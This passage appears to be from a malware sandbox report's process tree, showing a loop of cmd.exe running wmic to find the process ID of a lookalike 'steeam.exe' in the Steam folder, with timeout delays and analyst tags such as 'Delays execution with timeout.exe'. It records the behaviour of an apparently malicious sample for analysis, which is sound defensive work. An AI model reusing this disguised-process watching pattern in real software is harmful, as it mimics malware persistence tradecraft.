C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5004 -s 3368⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
